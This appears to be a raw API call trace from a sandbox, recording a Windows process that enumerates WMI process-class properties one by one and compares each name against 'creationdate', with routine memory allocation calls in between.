[0563.142] IWbemClassObject:Get (in: This=0x364280, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ExecutionState", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.142] free (_Block=0x189680)
[0563.142] malloc (_Size=0x18) returned 0x189680
[0563.142] lstrlenW (lpString="Handle") returned 6
[0563.143] lstrlenW (lpString="creationdate") returned 12
[0563.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Handle", cchCount2=6) returned 1
[0563.143] free (_Block=0x189680)
[0563.143] IUnknown:Release (This=0x364280) returned 0x1
[0563.143] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.143] malloc (_Size=0x18) returned 0x189680
[0563.143] IWbemClassObject:Get (in: This=0x3648c0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.143] free (_Block=0x189680)
[0563.143] malloc (_Size=0x18) returned 0x189680
[0563.143] IWbemClassObject:Get (in: This=0x3648c0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Handle", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.143] free (_Block=0x189680)
[0563.143] malloc (_Size=0x18) returned 0x189680
[0563.143] lstrlenW (lpString="HandleCount") returned 11
[0563.144] lstrlenW (lpString="creationdate") returned 12
[0563.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="HandleCount", cchCount2=11) returned 1
[0563.144] free (_Block=0x189680)
[0563.144] IUnknown:Release (This=0x3648c0) returned 0x1
[0563.144] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.144] malloc (_Size=0x18) returned 0x189680
[0563.144] IWbemClassObject:Get (in: This=0x364e10, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.144] free (_Block=0x189680)
[0563.144] malloc (_Size=0x18) returned 0x189680
[0563.144] IWbemClassObject:Get (in: This=0x364e10, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HandleCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.144] free (_Block=0x189680)
[0563.144] malloc (_Size=0x18) returned 0x189680
[0563.145] lstrlenW (lpString="InstallDate") returned 11
[0563.145] lstrlenW (lpString="creationdate") returned 12
[0563.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="InstallDate", cchCount2=11) returned 1
[0563.145] free (_Block=0x189680)
[0563.145] IUnknown:Release (This=0x364e10) returned 0x1
[0563.145] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.145] malloc (_Size=0x18) returned 0x189680
[0563.145] IWbemClassObject:Get (in: This=0x365360, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.145] free (_Block=0x189680)
[0563.145] malloc (_Size=0x18) returned 0x189680
[0563.145] IWbemClassObject:Get (in: This=0x365360, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.146] free (_Block=0x189680)
[0563.146] malloc (_Size=0x18) returned 0x189680
[0563.146] lstrlenW (lpString="KernelModeTime") returned 14
[0563.146] lstrlenW (lpString="creationdate") returned 12
[0563.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="KernelModeTime", cchCount2=14) returned 1
[0563.146] free (_Block=0x189680)
[0563.146] IUnknown:Release (This=0x365360) returned 0x1
[0563.146] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.146] malloc (_Size=0x18) returned 0x189680
[0563.146] IWbemClassObject:Get (in: This=0x365610, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.147] free (_Block=0x189680)
[0563.147] malloc (_Size=0x18) returned 0x189680
[0563.147] IWbemClassObject:Get (in: This=0x365610, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="KernelModeTime", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.147] free (_Block=0x189680)
[0563.147] malloc (_Size=0x18) returned 0x189680
[0563.147] lstrlenW (lpString="MaximumWorkingSetSize") returned 21
[0563.147] lstrlenW (lpString="creationdate") returned 12
[0563.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="MaximumWorkingSetSize", cchCount2=21) returned 1
[0563.148] free (_Block=0x189680)
[0563.148] IUnknown:Release (This=0x365610) returned 0x1
[0563.148] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.148] malloc (_Size=0x18) returned 0x189680
[0563.148] IWbemClassObject:Get (in: This=0x3658c0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.148] free (_Block=0x189680)
[0563.148] malloc (_Size=0x18) returned 0x189680
[0563.148] IWbemClassObject:Get (in: This=0x3658c0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaximumWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.148] free (_Block=0x189680)
[0563.148] malloc (_Size=0x18) returned 0x189680
[0563.149] lstrlenW (lpString="MinimumWorkingSetSize") returned 21
[0563.149] lstrlenW (lpString="creationdate") returned 12
[0563.149] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="MinimumWorkingSetSize", cchCount2=21) returned 1
[0563.149] free (_Block=0x189680)
[0563.149] IUnknown:Release (This=0x3658c0) returned 0x1
[0563.149] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.149] malloc (_Size=0x18) returned 0x189680
[0563.149] IWbemClassObject:Get (in: This=0x365b70, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.149] free (_Block=0x189680)
[0563.149] malloc (_Size=0x18) returned 0x189680
[0563.149] IWbemClassObject:Get (in: This=0x365b70, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MinimumWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.150] free (_Block=0x189680)
[0563.150] malloc (_Size=0x18) returned 0x189680
[0563.150] lstrlenW (lpString="Name") returned 4
[0563.150] lstrlenW (lpString="creationdate") returned 12
[0563.150] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Name", cchCount2=4) returned 1
[0563.150] free (_Block=0x189680)
[0563.150] IUnknown:Release (This=0x365b70) returned 0x1
[0563.150] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.150] malloc (_Size=0x18) returned 0x189680
[0563.150] IWbemClassObject:Get (in: This=0x365e20, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.150] free (_Block=0x189680)
[0563.150] malloc (_Size=0x18) returned 0x189680
[0563.150] IWbemClassObject:Get (in: This=0x365e20, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.151] free (_Block=0x189680)
[0563.151] malloc (_Size=0x18) returned 0x189680
[0563.151] lstrlenW (lpString="OSName") returned 6
[0563.151] lstrlenW (lpString="creationdate") returned 12
[0563.151] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OSName", cchCount2=6) returned 1
[0563.151] free (_Block=0x189680)
[0563.151] IUnknown:Release (This=0x365e20) returned 0x1
[0563.151] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.151] malloc (_Size=0x18) returned 0x189680
[0563.151] IWbemClassObject:Get (in: This=0x3660d0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.151] free (_Block=0x189680)
[0563.152] malloc (_Size=0x18) returned 0x189680
[0563.152] IWbemClassObject:Get (in: This=0x3660d0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OSName", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.152] free (_Block=0x189680)
[0563.152] malloc (_Size=0x18) returned 0x189680
[0563.152] lstrlenW (lpString="OtherOperationCount") returned 19
[0563.152] lstrlenW (lpString="creationdate") returned 12
[0563.152] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OtherOperationCount", cchCount2=19) returned 1
[0563.152] free (_Block=0x189680)
[0563.152] IUnknown:Release (This=0x3660d0) returned 0x1
[0563.153] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.153] malloc (_Size=0x18) returned 0x189680
[0563.153] IWbemClassObject:Get (in: This=0x366380, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.153] free (_Block=0x189680)
[0563.153] malloc (_Size=0x18) returned 0x189680
[0563.153] IWbemClassObject:Get (in: This=0x366380, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.153] free (_Block=0x189680)
[0563.153] malloc (_Size=0x18) returned 0x189680
[0563.154] lstrlenW (lpString="OtherTransferCount") returned 18
[0563.154] lstrlenW (lpString="creationdate") returned 12
[0563.154] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="OtherTransferCount", cchCount2=18) returned 1
[0563.154] free (_Block=0x189680)
[0563.154] IUnknown:Release (This=0x366380) returned 0x1
[0563.154] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.154] malloc (_Size=0x18) returned 0x189680
[0563.154] IWbemClassObject:Get (in: This=0x366630, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.155] free (_Block=0x189680)
[0563.155] malloc (_Size=0x18) returned 0x189680
[0563.155] IWbemClassObject:Get (in: This=0x366630, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTransferCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.155] free (_Block=0x189680)
[0563.155] malloc (_Size=0x18) returned 0x189680
[0563.155] lstrlenW (lpString="PageFaults") returned 10
[0563.155] lstrlenW (lpString="creationdate") returned 12
[0563.156] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PageFaults", cchCount2=10) returned 1
[0563.156] free (_Block=0x189680)
[0563.156] IUnknown:Release (This=0x366630) returned 0x1
[0563.156] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.156] malloc (_Size=0x18) returned 0x189680
[0563.156] IWbemClassObject:Get (in: This=0x3668e0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.156] free (_Block=0x189680)
[0563.156] malloc (_Size=0x18) returned 0x189680
[0563.156] IWbemClassObject:Get (in: This=0x3668e0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFaults", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.157] free (_Block=0x189680)
[0563.157] malloc (_Size=0x18) returned 0x189680
[0563.157] lstrlenW (lpString="PageFileUsage") returned 13
[0563.157] lstrlenW (lpString="creationdate") returned 12
[0563.157] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PageFileUsage", cchCount2=13) returned 1
[0563.157] free (_Block=0x189680)
[0563.157] IUnknown:Release (This=0x3668e0) returned 0x1
[0563.157] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.157] malloc (_Size=0x18) returned 0x189680
[0563.157] IWbemClassObject:Get (in: This=0x366b90, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.158] free (_Block=0x189680)
[0563.158] malloc (_Size=0x18) returned 0x189680
[0563.158] IWbemClassObject:Get (in: This=0x366b90, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PageFileUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.158] free (_Block=0x189680)
[0563.158] malloc (_Size=0x18) returned 0x189680
[0563.158] lstrlenW (lpString="ParentProcessId") returned 15
[0563.158] lstrlenW (lpString="creationdate") returned 12
[0563.158] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ParentProcessId", cchCount2=15) returned 1
[0563.159] free (_Block=0x189680)
[0563.159] IUnknown:Release (This=0x366b90) returned 0x1
[0563.159] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.159] malloc (_Size=0x18) returned 0x189680
[0563.159] IWbemClassObject:Get (in: This=0x366e40, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.159] free (_Block=0x189680)
[0563.159] malloc (_Size=0x18) returned 0x189680
[0563.159] IWbemClassObject:Get (in: This=0x366e40, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ParentProcessId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.159] free (_Block=0x189680)
[0563.159] malloc (_Size=0x18) returned 0x189680
[0563.160] lstrlenW (lpString="PeakPageFileUsage") returned 17
[0563.160] lstrlenW (lpString="creationdate") returned 12
[0563.160] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakPageFileUsage", cchCount2=17) returned 1
[0563.160] free (_Block=0x189680)
[0563.160] IUnknown:Release (This=0x366e40) returned 0x1
[0563.160] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.160] malloc (_Size=0x18) returned 0x189680
[0563.160] IWbemClassObject:Get (in: This=0x3670f0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.160] free (_Block=0x189680)
[0563.161] malloc (_Size=0x18) returned 0x189680
[0563.161] IWbemClassObject:Get (in: This=0x3670f0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakPageFileUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.161] free (_Block=0x189680)
[0563.161] malloc (_Size=0x18) returned 0x189680
[0563.161] lstrlenW (lpString="PeakVirtualSize") returned 15
[0563.161] lstrlenW (lpString="creationdate") returned 12
[0563.161] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakVirtualSize", cchCount2=15) returned 1
[0563.161] free (_Block=0x189680)
[0563.161] IUnknown:Release (This=0x3670f0) returned 0x1
[0563.161] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.162] malloc (_Size=0x18) returned 0x189680
[0563.162] IWbemClassObject:Get (in: This=0x3673a0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.162] free (_Block=0x189680)
[0563.162] malloc (_Size=0x18) returned 0x189680
[0563.162] IWbemClassObject:Get (in: This=0x3673a0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakVirtualSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.162] free (_Block=0x189680)
[0563.162] malloc (_Size=0x18) returned 0x189680
[0563.162] lstrlenW (lpString="PeakWorkingSetSize") returned 18
[0563.162] lstrlenW (lpString="creationdate") returned 12
[0563.163] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PeakWorkingSetSize", cchCount2=18) returned 1
[0563.163] free (_Block=0x189680)
[0563.163] IUnknown:Release (This=0x3673a0) returned 0x1
[0563.163] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.163] malloc (_Size=0x18) returned 0x189680
[0563.163] IWbemClassObject:Get (in: This=0x367650, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.163] free (_Block=0x189680)
[0563.163] malloc (_Size=0x18) returned 0x189680
[0563.163] IWbemClassObject:Get (in: This=0x367650, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PeakWorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.163] free (_Block=0x189680)
[0563.163] malloc (_Size=0x18) returned 0x189680
[0563.163] lstrlenW (lpString="Priority") returned 8
[0563.164] lstrlenW (lpString="creationdate") returned 12
[0563.164] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Priority", cchCount2=8) returned 1
[0563.164] free (_Block=0x189680)
[0563.164] IUnknown:Release (This=0x367650) returned 0x1
[0563.164] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.164] malloc (_Size=0x18) returned 0x189680
[0563.164] IWbemClassObject:Get (in: This=0x367900, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.164] free (_Block=0x189680)
[0563.164] malloc (_Size=0x18) returned 0x189680
[0563.164] IWbemClassObject:Get (in: This=0x367900, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Priority", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.164] free (_Block=0x189680)
[0563.164] malloc (_Size=0x18) returned 0x189680
[0563.165] lstrlenW (lpString="PrivatePageCount") returned 16
[0563.165] lstrlenW (lpString="creationdate") returned 12
[0563.165] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="PrivatePageCount", cchCount2=16) returned 1
[0563.165] free (_Block=0x189680)
[0563.165] IUnknown:Release (This=0x367900) returned 0x1
[0563.165] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.165] malloc (_Size=0x18) returned 0x189680
[0563.165] IWbemClassObject:Get (in: This=0x367bb0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.165] free (_Block=0x189680)
